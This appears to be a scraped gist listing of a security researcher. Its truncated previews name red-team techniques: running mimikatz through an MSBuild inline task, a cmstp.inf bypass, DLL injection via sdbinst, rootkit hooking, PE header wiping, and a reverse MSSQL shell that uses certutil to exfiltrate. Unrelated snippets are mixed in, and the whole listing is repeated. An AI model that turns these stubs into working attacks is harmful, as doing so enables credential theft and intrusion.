jackson5 jackson5sec

## WipePEHeader.cpp
#include "stdafx.h"
#include <Windows.h>
#include <iostream>

void WipePEHeader(HANDLE GetModuleBase)
{
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)GetModuleBase;
	PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + (DWORD)pDosHeader->e_lfanew);

	printf("NT Header at : %p\n", pNTHeader);

## Injectable.cpp
#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

## script.ps1

#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99


## Katz.Proj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes mimikatz. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask

## Power Limit for Nvidia GPUs
#!/bin/bash
#set persistence mode for all GPU
sudo nvidia-smi -pm 1

#Set gpu max power at 160w
sudo nvidia-smi -pl 160

#Set Power level of specific GPU (1080) in watts
# sudo nvidia-smi -i 2 -pl 200

## cmstp.inf
;cmstp.exe /s cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]

## gist:9048d605616ab1551c620b18638a2d26
function zip ($zipFilePath, $targetDir) {
  # load Ionic.Zip.dll
  [System.Reflection.Assembly]::LoadFrom(path\to\Ionic.Zip.dll)
  $encoding = [System.Text.Encoding]::GetEncoding("shift_jis") # 日本語のファイルを扱うために必要
  $zipfile =  new-object Ionic.Zip.ZipFile($encoding)

  $zipfile.AddDirectory($targetDir)

  if (!(test-path (split-path $zipFilePath -parent))) {
    mkdir (split-path $zipFilePath -parent)

## dllinjshim.cpp
/*

-------- dllinjshim.cpp --------

> cl /Fe:dllinjshim.exe dllinjshim.cpp
> dllinjshim.exe
> sdbinst moo.sdb

------------------------------------

## MSBuildProcDumper.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
  <!-- Feel free to use a more aggressive class for testing. -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"

## mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
	#include "stdafx.h"
	#include <Windows.h>
	#include <iostream>

	void WipePEHeader(HANDLE GetModuleBase)
	{
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)GetModuleBase;
	PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + (DWORD)pDosHeader->e_lfanew);

	printf("NT Header at : %p\n", pNTHeader);
	#include <windows.h>
	#include <stdio.h>


	FARPROC fpCreateProcessW;
	BYTE bSavedByte;

	// Blog Post Here:
	// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
	// tasklist \| findstr explore.exe

	#Verify Not Present
	( Get-ChildItem Cert:\CurrentUser\Root \| Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
	#Import-Certificate
	( Get-ChildItem -Path C:\Test\thing.cer ) \| Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
	#Prompted
	Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes mimikatz. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
	<!-- Save This File And Execute The Above Command -->
	<!-- Author: Casey Smith, Twitter: @subTee -->
	<!-- License: BSD 3-Clause -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	#!/bin/bash
	#set persistence mode for all GPU
	sudo nvidia-smi -pm 1

	#Set gpu max power at 160w
	sudo nvidia-smi -pl 160

	#Set Power level of specific GPU (1080) in watts
	# sudo nvidia-smi -i 2 -pl 200
	;cmstp.exe /s cmstp.inf

	[version]
	Signature=$chicago$
	AdvancedINF=2.5

	[DefaultInstall_SingleUser]
	UnRegisterOCXs=UnRegisterOCXSection

	[UnRegisterOCXSection]
	function zip ($zipFilePath, $targetDir) {
	# load Ionic.Zip.dll
	[System.Reflection.Assembly]::LoadFrom(path\to\Ionic.Zip.dll)
	$encoding = [System.Text.Encoding]::GetEncoding("shift_jis") # 日本語のファイルを扱うために必要
	$zipfile = new-object Ionic.Zip.ZipFile($encoding)

	$zipfile.AddDirectory($targetDir)

	if (!(test-path (split-path $zipFilePath -parent))) {
	mkdir (split-path $zipFilePath -parent)
	/*

	-------- dllinjshim.cpp --------

	> cl /Fe:dllinjshim.exe dllinjshim.cpp
	> dllinjshim.exe
	> sdbinst moo.sdb

	------------------------------------
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
	<!-- Feel free to use a more aggressive class for testing. -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	import sys
	import requests
	import threading
	import HTMLParser
	from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

	'''
	Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
	Author: @xassiz
	'''